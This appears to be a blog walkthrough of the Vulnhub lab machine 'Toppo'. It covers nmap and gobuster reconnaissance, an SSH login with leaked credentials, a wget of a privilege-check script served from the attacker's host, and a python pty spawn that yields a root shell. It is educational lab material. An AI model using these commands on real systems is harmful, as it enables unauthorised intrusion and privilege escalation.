Vulnhub Toppo Walkthrough

toppo1

Today’s writeup is a machine called Toppo from Vulnhub. Toppo is rated at beginner level and is fairly simple to root. Depending on how you go about the privilege escalation, it could throw you off a bit.

I started off by running a typical nmap scan (nmap -sV -sC -v 192.168.2.92 -oN map1). It has SSH and Port 80 open. Let’s check out the web page.

toppo2

Here we have a blog site, but not much else. Let’s run a directory brute force to see if anything else can be found.

toppo3

Running gobuster provides us with an interesting admin directory. Gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 192.168.2.92

 

toppo4

In the admin directory are some notes.

toppo5

The notes give us the user name and password for something. Let’s try it out on SSH.

toppo6

SSH worked!

toppo7

Checking some basics like the bash history and sudo permissions doesn’t yield anything. So I used wget to bring over linuxprivcheker.py and ran it.

python -m SimpleHTTPServer 80

wget 192.168.2.30/linuxprivchecker.py

toppo8

When running the script something interesting happened. It said I was already root.

toppo9

What’s happening here is that python runs as root. This means that if we spawn a shell with python, we can be root too.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

toppo10

Ok so what went wrong? The script clearly ran as root (it even dumped the shadow file), so why didn’t we get a root shell? Somethings not right. Let’s try it again with sh.

toppo11

Ok that worked. Now we’re root. It looks like bash will always run under the context of the ted user, but sh works normally. Now we can get the flag.

toppo12

That’s Toppo. It’s a basic and quick box to pop. If you used sh with python from the start, you’d completely miss the weird bash issue. Another way to do it would have been to spawn a python reverse shell. Alternatively, it might have been possible to crack the root password from the shadow file dump (after running linuxprivchecker), but I didn’t try it.

If you’d like to see a video walkthrough with the python reverse shell, you can find it here.

Hope you found this helpful.

-R3a50n

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s